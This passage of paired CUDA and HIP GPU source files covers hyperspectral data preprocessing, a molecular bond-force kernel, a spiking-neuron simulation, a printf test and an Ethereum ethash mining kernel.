NEU_NUM2); matPutVariable(pmatFile0, "labels", m4); matClose(pmatFile0); return 0; } // int main(int argc, char * argv[]) { if(!InitCUDA()){ return 0; } printf("CUDA initialized.\n"); clock_t start,end; double *trainset,*trainlabels; if(argc!=2){ fprintf(stderr, "4 input arguments required!"); } MATFile * datamat = matOpen(argv[1], "r"); mxArray * train = matGetVariable(datamat,"DataSet"); mxArray * labels = matGetVariable(datamat,"labels"); trainset = (double*)mxGetData(train); trainlabels = (double*)mxGetData(labels); fprintf(stdout,"Data reading completed!\n"); fprintf(stdout,"trainlabels:%lf %lf %lf %lf\n",trainlabels[87],trainlabels[88],trainlabels[89],trainlabels[90]); const mwSize * dim; dim = mxGetDimensions(train);//trainset fprintf(stdout,"Dimension:%d %d %d\n",dim[0],dim[1],dim[2]); start = clock(); int te = preprocess(trainset, trainlabels, dim[0], dim[1], dim[2]); end = clock(); double usetime = double(end - start); fprintf(stdout, "Using time of preprocessing:%lfs\n",usetime/CLOCKS_PER_SEC); return 0; }
35a31397fcaf9cc86ea9e0d7cf3eceb4bad50cb9.cu
#include <mat.h> #include <stdio.h> #include <time.h> #include <sys/time.h> #include <math.h> #include <iostream> #include "cublas_v2.h" #include "cokus.cpp" #include "cuda_util.h" #include <cuda_runtime.h> using namespace std; const int NEU_NUM2 = 13; const int NEIGHBOR = 8;//定义邻居个数 //const int DATA_BATCH = 512;//每次处理512个像素对应的数据 //CUDA初始化 bool InitCUDA(){ int count; cudaGetDeviceCount(&count); if(count==0){ fprintf(stderr,"There is no device.\n"); return false; } int i; for (i =0; i<count;i++){ cudaDeviceProp prop; if(cudaGetDeviceProperties(&prop,i)==cudaSuccess){ if(prop.major>=1){ break; } } } if(i==count){ fprintf(stderr,"There is no device supporting CUDA 1.x.\n"); return false; } cudaSetDevice(i); return true; } //copy数据到shared memory __device__ void copy_data_to_shared(double * data, double * data_tmp, int length){ for(int i=0; i<length; i++){ data_tmp[i] = data[i]; } __syncthreads(); } //显卡处理数据 __global__ static void processing(int iter, double * data, int * train_index, double * processed_data, int x, int y, int z, int train_size) { int tid = blockIdx.x * blockDim.x + threadIdx.x; int threadNum = blockDim.x * gridDim.x; int id = tid + iter * threadNum; int idx = id * (NEIGHBOR+1) * z;//记录processed_data的开始位置 if (id < train_size){ for (int i=0; i<z; i++){ for (int j=0; j<(NEIGHBOR+1); j++){ processed_data[idx] = data[train_index[j + id*(NEIGHBOR+1)] + i * x*y]; idx = idx + 1; } } } } //数据预处理 int preprocess(double * data, double * labels, int x, int y, int z){ double * gpu_data;//显存上存储原始数据 double * gpu_processed_train;//显存上存储处理之后的数据 double * gpu_processed_test; int * gpu_train_index;//训练数据的索引 int * gpu_test_index; //计算有标签像素的个数 int data_size = 0; int * data_index = new int [x*y]; for(int i=0; i<x*y; i++){ if(labels[i] != 0){ data_index[data_size]=i; data_size ++; } } int test_size = (data_size-1)/5 + 1; int train_size = data_size - test_size; fprintf(stdout,"train_size:%d test_size:%d\n",train_size,test_size); int * train_index = new int [train_size * (NEIGHBOR + 1)];//9行,x*y列。每列保存一个像素及其邻居的索引位置 int * test_index = new int [test_size * (NEIGHBOR+1)]; double * processed_labels = new double [train_size * NEU_NUM2]; double * test_labels = new double [test_size]; int tr=0, te=0; for (int i=0; i<data_size; i++){ if (i%5 != 0){ train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1)] = data_index[i];//当前像素索引 train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) - 1] = data_index[i] - 1; train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ train_index[j0 + tr * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; train_index[j0+6 + tr * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){//第一行 for (int j=0; j<3; j++) train_index[j*3 + tr*(NEIGHBOR+1)] = train_index[j*3+2 + tr*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){//最后一行 for(int j=0;j<3;j++) train_index[j*3+2 + tr*(NEIGHBOR+1)] = train_index[j*3 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){//第一列 for(int j=0;j<3;j++) train_index[j + tr*(NEIGHBOR+1)] = train_index[j+6 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){//最后一列 for(int j=0;j<3;j++) train_index[j+6 + tr*(NEIGHBOR+1)] = train_index[j + tr*(NEIGHBOR+1)]; } int mid = int(labels[data_index[i]])-1 + tr*NEU_NUM2; processed_labels[mid] = 1; tr = tr + 1; } else{ test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1)] = data_index[i];//当前像素索引 test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) - 1] = data_index[i] - 1; test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ test_index[j0 + te * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; test_index[j0+6 + te * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){//第一行 for (int j=0; j<3; j++) test_index[j*3 + te*(NEIGHBOR+1)] = test_index[j*3+2 + te*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){//最后一行 for(int j=0;j<3;j++) test_index[j*3+2 + te*(NEIGHBOR+1)] = test_index[j*3 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){//第一列 for(int j=0;j<3;j++) test_index[j + te*(NEIGHBOR+1)] = test_index[j+6 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){//最后一列 for(int j=0;j<3;j++) test_index[j+6 + te*(NEIGHBOR+1)] = test_index[j + te*(NEIGHBOR+1)]; } //int mid = int(labels[data_index[i]])-1 + te*NEU_NUM2; test_labels[te] = labels[data_index[i]]; te = te + 1; } } fprintf(stdout,"train_size:%d\n",train_size); fprintf(stdout,"test_size:%d\n",test_size); //fprintf(stdout,"train_index[0]:%d %d %d %d,%d %d %d %d\n",train_index[0],train_index[1],train_index[2],train_index[3],train_index[5],train_index[6],train_index[7],train_index[8]); //fprintf(stdout,"train_index[10248]:%d %d %d %d,%d %d %d %d\n",train_index[9*10248],train_index[1+9*10248],train_index[2+9*10248],train_index[3+9*10248],train_index[5+9*10248],train_index[6+9*10248],train_index[7+9*10248],train_index[8+9*10248]); //int * train_index = new int [train_size * (NEIGHBOR + 1)];//train_size列,9行。每行保存一个像素及其邻居的索引位置 fprintf(stdout,"Index computing completed!\n"); //分配显存,拷贝数据到显存上 SAFE_CALL(cudaMalloc((void **) &gpu_data, sizeof(double) * x * y * z)); SAFE_CALL(cudaMemcpy(gpu_data, data, sizeof(double)* x * y * z, cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_train_index, sizeof(int) * train_size * (NEIGHBOR+1))); SAFE_CALL(cudaMemcpy(gpu_train_index, train_index, sizeof(int) * train_size * (NEIGHBOR+1), cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_test_index, sizeof(int) * test_size * (NEIGHBOR+1))); SAFE_CALL(cudaMemcpy(gpu_test_index, test_index, sizeof(int) * test_size * (NEIGHBOR+1), cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z));//每一批数据的大小 SAFE_CALL(cudaMalloc((void **) &gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z)); int gridsize = 64; int blocksize = 1024; int threadnum = gridsize * blocksize; double * processed_train = new double [train_size * (NEIGHBOR+1) * z];\ double * processed_test = new double [test_size * (NEIGHBOR+1) *z]; //预处理 for (int iter=0; iter<=train_size/threadnum; iter++){ processing<<<gridsize,blocksize>>>(iter, gpu_data, gpu_train_index, gpu_processed_train, x, y, z, train_size); processing<<<gridsize,blocksize>>>(iter, gpu_data, gpu_test_index, gpu_processed_test, x, y, z, test_size); } cudaDeviceSynchronize(); SAFE_CALL(cudaMemcpy(processed_train, gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z, cudaMemcpyDeviceToHost)); SAFE_CALL(cudaMemcpy(processed_test, gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z, cudaMemcpyDeviceToHost)); //cudaDeviceSynchronize(); fprintf(stdout,"Processed train data:%lf %lf %lf %lf\n",processed_train[0],processed_train[1],processed_train[2],processed_train[3]); fprintf(stdout,"Processed test data:%lf %lf %lf %lf\n",processed_test[0],processed_test[1],processed_test[2],processed_test[3]); MATFile * pmatFile; pmatFile = matOpen("testdata.mat","w"); mxArray * m1 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,test_size,mxREAL); memcpy((void *)mxGetPr(m1), (void *)processed_test, sizeof(double) * (NEIGHBOR+1) * z * test_size); matPutVariable(pmatFile, "data", m1); mxArray * m2 = mxCreateDoubleMatrix(test_size,1,mxREAL); memcpy((void *)mxGetPr(m2), (void *)test_labels, sizeof(double) * test_size); matPutVariable(pmatFile, "data", m2); matClose(pmatFile); MATFile * pmatFile0; pmatFile0 = matOpen("traindata.mat","w"); mxArray * m3 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,train_size,mxREAL); memcpy((void *)mxGetPr(m3), (void *)processed_train, sizeof(double) * (NEIGHBOR+1) * z * train_size); matPutVariable(pmatFile0, "data", m3); mxArray * m4 = mxCreateDoubleMatrix(NEU_NUM2,train_size,mxREAL); memcpy((void *)mxGetPr(m4), (void *)processed_labels, sizeof(double) * train_size * NEU_NUM2); matPutVariable(pmatFile0, "labels", m4); matClose(pmatFile0); return 0; } //主函数 int main(int argc, char * argv[]) { if(!InitCUDA()){ return 0; } printf("CUDA initialized.\n"); clock_t start,end; double *trainset,*trainlabels; if(argc!=2){ fprintf(stderr, "4 input arguments required!"); } MATFile * datamat = matOpen(argv[1], "r"); mxArray * train = matGetVariable(datamat,"DataSet"); mxArray * labels = matGetVariable(datamat,"labels"); trainset = (double*)mxGetData(train); trainlabels = (double*)mxGetData(labels); fprintf(stdout,"Data reading completed!\n"); fprintf(stdout,"trainlabels:%lf %lf %lf %lf\n",trainlabels[87],trainlabels[88],trainlabels[89],trainlabels[90]); const mwSize * dim; dim = mxGetDimensions(train);//获取trainset每维的元素个数 fprintf(stdout,"Dimension:%d %d %d\n",dim[0],dim[1],dim[2]); start = clock(); int te = preprocess(trainset, trainlabels, dim[0], dim[1], dim[2]); end = clock(); double usetime = double(end - start); fprintf(stdout, "Using time of preprocessing:%lfs\n",usetime/CLOCKS_PER_SEC); return 0; }
a5c45efce0b34a7608fda4d0c1fa9b910ad419b7.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * Copyright 2021 Huawei Technologies Co., Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "backend/kernel_compiler/gpu/cuda_impl/sponge/bond/bond_force_with_atom_energy_impl.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/sponge/common_sponge.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/util.cuh" __global__ void BondForceWithAtomEnergyKernel(int bond_numbers, const UNSIGNED_INT_VECTOR *uint_crd, const VECTOR *scaler, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, VECTOR *frc, float *atom_energy) { int bond_i = blockDim.x * blockIdx.x + threadIdx.x; if (bond_i < bond_numbers) { int atom_i = atom_a[bond_i]; int atom_j = atom_b[bond_i]; float k = bond_k[bond_i]; float r0 = bond_r0[bond_i]; VECTOR dr = Get_Periodic_Displacement(uint_crd[atom_i], uint_crd[atom_j], scaler[0]); float abs_r = norm3df(dr.x, dr.y, dr.z); float r_1 = 1. / abs_r; float tempf = abs_r - r0; VECTOR f = 2 * tempf * r_1 * k * dr; atomicAdd(&frc[atom_i].x, -f.x); atomicAdd(&frc[atom_i].y, -f.y); atomicAdd(&frc[atom_i].z, -f.z); atomicAdd(&frc[atom_j].x, f.x); atomicAdd(&frc[atom_j].y, f.y); atomicAdd(&frc[atom_j].z, f.z); atomicAdd(&atom_energy[atom_i], k * tempf * tempf); } } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, hipStream_t stream) { size_t thread_per_block = 128; size_t block_per_grid = ceilf(static_cast<float>(bond_numbers) / 128); UNSIGNED_INT_VECTOR *uint_crd = const_cast<UNSIGNED_INT_VECTOR *>(reinterpret_cast<const UNSIGNED_INT_VECTOR *>(uint_crd_f)); VECTOR *frc = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(frc_f)); VECTOR *scaler = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(scaler_f)); hipLaunchKernelGGL(( BondForceWithAtomEnergyKernel), dim3(block_per_grid), dim3(thread_per_block), 0, stream, bond_numbers, uint_crd, scaler, atom_a, atom_b, bond_k, bond_r0, frc, atom_e); return; } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, hipStream_t stream);
a5c45efce0b34a7608fda4d0c1fa9b910ad419b7.cu
/** * Copyright 2021 Huawei Technologies Co., Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "backend/kernel_compiler/gpu/cuda_impl/sponge/bond/bond_force_with_atom_energy_impl.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/sponge/common_sponge.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/util.cuh" __global__ void BondForceWithAtomEnergyKernel(int bond_numbers, const UNSIGNED_INT_VECTOR *uint_crd, const VECTOR *scaler, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, VECTOR *frc, float *atom_energy) { int bond_i = blockDim.x * blockIdx.x + threadIdx.x; if (bond_i < bond_numbers) { int atom_i = atom_a[bond_i]; int atom_j = atom_b[bond_i]; float k = bond_k[bond_i]; float r0 = bond_r0[bond_i]; VECTOR dr = Get_Periodic_Displacement(uint_crd[atom_i], uint_crd[atom_j], scaler[0]); float abs_r = norm3df(dr.x, dr.y, dr.z); float r_1 = 1. / abs_r; float tempf = abs_r - r0; VECTOR f = 2 * tempf * r_1 * k * dr; atomicAdd(&frc[atom_i].x, -f.x); atomicAdd(&frc[atom_i].y, -f.y); atomicAdd(&frc[atom_i].z, -f.z); atomicAdd(&frc[atom_j].x, f.x); atomicAdd(&frc[atom_j].y, f.y); atomicAdd(&frc[atom_j].z, f.z); atomicAdd(&atom_energy[atom_i], k * tempf * tempf); } } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, cudaStream_t stream) { size_t thread_per_block = 128; size_t block_per_grid = ceilf(static_cast<float>(bond_numbers) / 128); UNSIGNED_INT_VECTOR *uint_crd = const_cast<UNSIGNED_INT_VECTOR *>(reinterpret_cast<const UNSIGNED_INT_VECTOR *>(uint_crd_f)); VECTOR *frc = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(frc_f)); VECTOR *scaler = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(scaler_f)); BondForceWithAtomEnergyKernel<<<block_per_grid, thread_per_block, 0, stream>>>(bond_numbers, uint_crd, scaler, atom_a, atom_b, bond_k, bond_r0, frc, atom_e); return; } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, cudaStream_t stream);
a50626310b3c16f64b3db69ec7611d5cd628427d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "iteration.cuh" /* Increment the time-step by 1. * For use only with a single block and a single thread */ __global__ void time_step(int *dev_time) { *dev_time += 1; } /* For all neurons with potential > IzTHRESHOLD, add their indices to * the fired array. Also reset the neurons which are firing. */ __global__ void find_firing_neurons(Neuron *neurons, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; float v, u; if (offset >= number) { // There are no such neurons return; } v = neurons[offset].potential; u = neurons[offset].recovery; if (v > IzTHRESHOLD) { fired[offset] = true; // reset firing neuruons neurons[offset].potential = IzC; neurons[offset].recovery = u + IzD; } } /* For all fired neurons, update the thalamic input on connected * neurons.*/ __global__ void update_current(Neuron *neurons, Connection *connections, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; int cIdx, nIdx; // First, make the current on all neurons 0 + the input value for // that neuron if (offset < number) { neurons[offset].current = 0 + 1000*neurons[offset].input; } // Ensure that *all* neurons have 0 current __syncthreads(); if (fired == NULL || fired[offset] == false) { // No such fired neuron return; } cIdx = neurons[offset].connection; if (connections != NULL) { do { nIdx = connections[cIdx].neuron; atomicAdd(&(neurons[nIdx].current), 1000*connections[cIdx].weight); // atomicAdd(&neurons[connections[cIdx].neuron].current, // 1.0f); cIdx = connections[cIdx].next; } while (cIdx >= 0); } }
a50626310b3c16f64b3db69ec7611d5cd628427d.cu
#include "iteration.cuh" /* Increment the time-step by 1. * For use only with a single block and a single thread */ __global__ void time_step(int *dev_time) { *dev_time += 1; } /* For all neurons with potential > IzTHRESHOLD, add their indices to * the fired array. Also reset the neurons which are firing. */ __global__ void find_firing_neurons(Neuron *neurons, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; float v, u; if (offset >= number) { // There are no such neurons return; } v = neurons[offset].potential; u = neurons[offset].recovery; if (v > IzTHRESHOLD) { fired[offset] = true; // reset firing neuruons neurons[offset].potential = IzC; neurons[offset].recovery = u + IzD; } } /* For all fired neurons, update the thalamic input on connected * neurons.*/ __global__ void update_current(Neuron *neurons, Connection *connections, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; int cIdx, nIdx; // First, make the current on all neurons 0 + the input value for // that neuron if (offset < number) { neurons[offset].current = 0 + 1000*neurons[offset].input; } // Ensure that *all* neurons have 0 current __syncthreads(); if (fired == NULL || fired[offset] == false) { // No such fired neuron return; } cIdx = neurons[offset].connection; if (connections != NULL) { do { nIdx = connections[cIdx].neuron; atomicAdd(&(neurons[nIdx].current), 1000*connections[cIdx].weight); // atomicAdd(&neurons[connections[cIdx].neuron].current, // 1.0f); cIdx = connections[cIdx].next; } while (cIdx >= 0); } }
5186caaf0da0c501969ce9e64b22dc208bed7178.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <stdlib.h> __global__ void testKernel(int param){ printf("%d, %d\n", threadIdx.x, param); } int main(void){ // initialize cuPrintf int N = 3; int a = 456; dim3 threadsPerBlock(N, N); printf("init\n"); hipLaunchKernelGGL(( testKernel), dim3(1),dim3(threadsPerBlock), 0, 0, a); return 0; }
5186caaf0da0c501969ce9e64b22dc208bed7178.cu
#include <stdio.h> #include <stdlib.h> __global__ void testKernel(int param){ printf("%d, %d\n", threadIdx.x, param); } int main(void){ // initialize cuPrintf int N = 3; int a = 456; dim3 threadsPerBlock(N, N); printf("init\n"); testKernel<<<1,threadsPerBlock>>>(a); return 0; }
201c007c85ed3f4bb13b67a66197e7058dfac145.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * Genoil's CUDA mining kernel for Ethereum * based on Tim Hughes' opencl kernel. * thanks to sp_, trpuvot, djm34, cbuchner for things i took from ccminer. */ #include "ethash_cuda_miner_kernel.h" #include "ethash_cuda_miner_kernel_globals.h" #include "cuda_helper.h" #include "fnv.cuh" #define copy(dst, src, count) for (int i = 0; i != count; ++i) { (dst)[i] = (src)[i]; } #include "keccak.cuh" #include "dagger_shuffled.cuh" template <uint32_t _PARALLEL_HASH> __global__ void ethash_search( volatile Search_results* g_output, uint64_t start_nonce ) { uint32_t const gid = blockIdx.x * blockDim.x + threadIdx.x; //uint2 mix[4]; if (compute_hash<_PARALLEL_HASH>(start_nonce + gid, d_target/*, mix*/)) return; uint32_t index = atomicInc((uint32_t *)&g_output->count, 0xffffffff); if (index >= MAX_SEARCH_RESULTS) return; g_output->result[index].gid = gid; #if 0 g_output->result[index].mix[0] = mix[0].x; g_output->result[index].mix[1] = mix[0].y; g_output->result[index].mix[2] = mix[1].x; g_output->result[index].mix[3] = mix[1].y; g_output->result[index].mix[4] = mix[2].x; g_output->result[index].mix[5] = mix[2].y; g_output->result[index].mix[6] = mix[3].x; g_output->result[index].mix[7] = mix[3].y; #endif } __host__ void run_ethash_search( uint32_t gridSize, uint32_t blockSize, hipStream_t stream, volatile Search_results* g_output, uint64_t start_nonce, uint32_t parallelHash ) { switch (parallelHash) { case 1:hipLaunchKernelGGL(( ethash_search <1>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 2:hipLaunchKernelGGL(( ethash_search <2>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 4:hipLaunchKernelGGL(( ethash_search <4>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 8:hipLaunchKernelGGL(( ethash_search <8>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; default:hipLaunchKernelGGL(( ethash_search <4>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; } CUDA_SAFE_CALL(hipGetLastError()); } #define ETHASH_DATASET_PARENTS 256 #define NODE_WORDS (64/4) __global__ void ethash_calculate_dag_item(uint32_t start) { uint32_t const node_index = start + blockIdx.x * blockDim.x + threadIdx.x; if (((node_index/4)*4) >= d_dag_size * 2) return; hash200_t dag_node; copy(dag_node.uint4s, d_light[node_index % d_light_size].uint4s, 4); dag_node.words[0] ^= node_index; SHA3_512(dag_node.uint2s); const int thread_id = threadIdx.x & 3; for (uint32_t i = 0; i != ETHASH_DATASET_PARENTS; ++i) { uint32_t parent_index = fnv(node_index ^ i, dag_node.words[i % NODE_WORDS]) % d_light_size; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,parent_index, t, 4); uint4 p4 = d_light[shuffle_index].uint4s[thread_id]; for (int w = 0; w < 4; w++) { uint4 s4 = make_uint4(__shfl_sync(0xFFFFFFFF,p4.x, w, 4), __shfl_sync(0xFFFFFFFF,p4.y, w, 4), __shfl_sync(0xFFFFFFFF,p4.z, w, 4), __shfl_sync(0xFFFFFFFF,p4.w, w, 4)); if (t == thread_id) { dag_node.uint4s[w] = fnv4(dag_node.uint4s[w], s4); } } } } SHA3_512(dag_node.uint2s); hash64_t * dag_nodes = (hash64_t *)d_dag; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,node_index, t, 4); uint4 s[4]; for (uint32_t w = 0; w < 4; w++) { s[w] = make_uint4(__shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].x, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].y, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].z, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].w, t, 4)); } if (shuffle_index < d_dag_size * 2) { dag_nodes[shuffle_index].uint4s[thread_id] = s[thread_id]; } } } #if 0 __host__ void ethash_generate_dag( uint64_t dag_size, uint32_t gridSize, uint32_t blockSize, hipStream_t stream ) { const uint32_t work = (uint32_t)(dag_size / sizeof(hash64_t)); const uint32_t run = gridSize * blockSize; uint32_t base; for (base = 0; base <= work - run; base += run) { hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(gridSize), dim3(blockSize), 0, stream, base); CUDA_SAFE_CALL(hipDeviceSynchronize()); } if (base < work) { uint32_t lastGrid = work - base; lastGrid = (lastGrid + blockSize - 1) / blockSize; hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(lastGrid), dim3(blockSize), 0, stream, base); CUDA_SAFE_CALL(hipDeviceSynchronize()); } CUDA_SAFE_CALL(hipGetLastError()); } #endif __host__ void ethash_generate_dag_part( uint64_t start, uint32_t gridSize, uint32_t blockSize, hipStream_t stream ) { hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(gridSize), dim3(blockSize), 0, stream, start); CUDA_SAFE_CALL(hipStreamSynchronize(stream)); } __host__ void set_constants( hash128_t* _dag, uint32_t _dag_size, hash64_t * _light, uint32_t _light_size ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_dag, &_dag, sizeof(hash128_t *))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_dag_size, &_dag_size, sizeof(uint32_t))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_light, &_light, sizeof(hash64_t *))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_light_size, &_light_size, sizeof(uint32_t))); } __host__ void set_header( hash32_t _header ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_header, &_header, sizeof(hash32_t))); } __host__ void set_target( uint64_t _target ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_target, &_target, sizeof(uint64_t))); }
201c007c85ed3f4bb13b67a66197e7058dfac145.cu
/* * Genoil's CUDA mining kernel for Ethereum * based on Tim Hughes' opencl kernel. * thanks to sp_, trpuvot, djm34, cbuchner for things i took from ccminer. */ #include "ethash_cuda_miner_kernel.h" #include "ethash_cuda_miner_kernel_globals.h" #include "cuda_helper.h" #include "fnv.cuh" #define copy(dst, src, count) for (int i = 0; i != count; ++i) { (dst)[i] = (src)[i]; } #include "keccak.cuh" #include "dagger_shuffled.cuh" template <uint32_t _PARALLEL_HASH> __global__ void ethash_search( volatile Search_results* g_output, uint64_t start_nonce ) { uint32_t const gid = blockIdx.x * blockDim.x + threadIdx.x; //uint2 mix[4]; if (compute_hash<_PARALLEL_HASH>(start_nonce + gid, d_target/*, mix*/)) return; uint32_t index = atomicInc((uint32_t *)&g_output->count, 0xffffffff); if (index >= MAX_SEARCH_RESULTS) return; g_output->result[index].gid = gid; #if 0 g_output->result[index].mix[0] = mix[0].x; g_output->result[index].mix[1] = mix[0].y; g_output->result[index].mix[2] = mix[1].x; g_output->result[index].mix[3] = mix[1].y; g_output->result[index].mix[4] = mix[2].x; g_output->result[index].mix[5] = mix[2].y; g_output->result[index].mix[6] = mix[3].x; g_output->result[index].mix[7] = mix[3].y; #endif } __host__ void run_ethash_search( uint32_t gridSize, uint32_t blockSize, cudaStream_t stream, volatile Search_results* g_output, uint64_t start_nonce, uint32_t parallelHash ) { switch (parallelHash) { case 1: ethash_search <1> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 2: ethash_search <2> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 4: ethash_search <4> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 8: ethash_search <8> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; default: ethash_search <4> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; } CUDA_SAFE_CALL(cudaGetLastError()); } #define ETHASH_DATASET_PARENTS 256 #define NODE_WORDS (64/4) __global__ void ethash_calculate_dag_item(uint32_t start) { uint32_t const node_index = start + blockIdx.x * blockDim.x + threadIdx.x; if (((node_index/4)*4) >= d_dag_size * 2) return; hash200_t dag_node; copy(dag_node.uint4s, d_light[node_index % d_light_size].uint4s, 4); dag_node.words[0] ^= node_index; SHA3_512(dag_node.uint2s); const int thread_id = threadIdx.x & 3; for (uint32_t i = 0; i != ETHASH_DATASET_PARENTS; ++i) { uint32_t parent_index = fnv(node_index ^ i, dag_node.words[i % NODE_WORDS]) % d_light_size; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,parent_index, t, 4); uint4 p4 = d_light[shuffle_index].uint4s[thread_id]; for (int w = 0; w < 4; w++) { uint4 s4 = make_uint4(__shfl_sync(0xFFFFFFFF,p4.x, w, 4), __shfl_sync(0xFFFFFFFF,p4.y, w, 4), __shfl_sync(0xFFFFFFFF,p4.z, w, 4), __shfl_sync(0xFFFFFFFF,p4.w, w, 4)); if (t == thread_id) { dag_node.uint4s[w] = fnv4(dag_node.uint4s[w], s4); } } } } SHA3_512(dag_node.uint2s); hash64_t * dag_nodes = (hash64_t *)d_dag; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,node_index, t, 4); uint4 s[4]; for (uint32_t w = 0; w < 4; w++) { s[w] = make_uint4(__shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].x, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].y, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].z, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].w, t, 4)); } if (shuffle_index < d_dag_size * 2) { dag_nodes[shuffle_index].uint4s[thread_id] = s[thread_id]; } } } #if 0 __host__ void ethash_generate_dag( uint64_t dag_size, uint32_t gridSize, uint32_t blockSize, cudaStream_t stream ) { const uint32_t work = (uint32_t)(dag_size / 